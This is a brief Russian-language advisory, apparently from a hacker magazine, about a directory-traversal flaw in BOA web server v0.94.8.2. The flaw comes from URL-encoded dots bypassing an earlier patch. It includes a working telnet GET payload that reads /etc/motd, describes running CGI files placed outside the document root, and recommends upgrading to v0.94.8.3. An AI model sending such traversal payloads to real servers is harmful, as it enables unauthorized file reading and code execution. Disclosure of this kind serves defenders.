Xakep #305. Многошаговые SQL-инъекции
BOA - это открытый веб-сервер
довольно высокого
уровня для Unix машин. Ошибка
в программе позволяет
получить доступ к любым
файлам на сервере.
Системы уязвимы:
BOA web server v0.94.8.2
Системы не уязвимы:
BOA web server v0.92
BOA web server v0.94.8.3
Типа, предыдущая прореха была наспех залатана
проверкой на "." А мы обойдем эту проверку,
закодив
"." в URL-запросе 🙂 Все,
контент любого файла почти
в твоих руках.
Пример:
$ telnet ilf 80
GET E%2E/%2E%2E/E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E
%2E/%2E%2E/%2E%2E/%2E%2E/etc/motd
HTTP/1.0
HTTP/1.0 200 OK
[... показывается содержание
/etc/motd]
Также, если админ разрешил
расширения на основе CGI и
в файле boa.conf есть подобная строка:
AddType application/x-httpd-cgi
cgi
то тогда результатом запроса
на файл CGI, будет выполнение этого файла с привилегиями
перца запустившего сервер.
Этот файл может быть
помещен в любую папку системы (не обязательно под
DocumentRoot).
Решение:
Апгрейд до BOA web server v0.94.8.3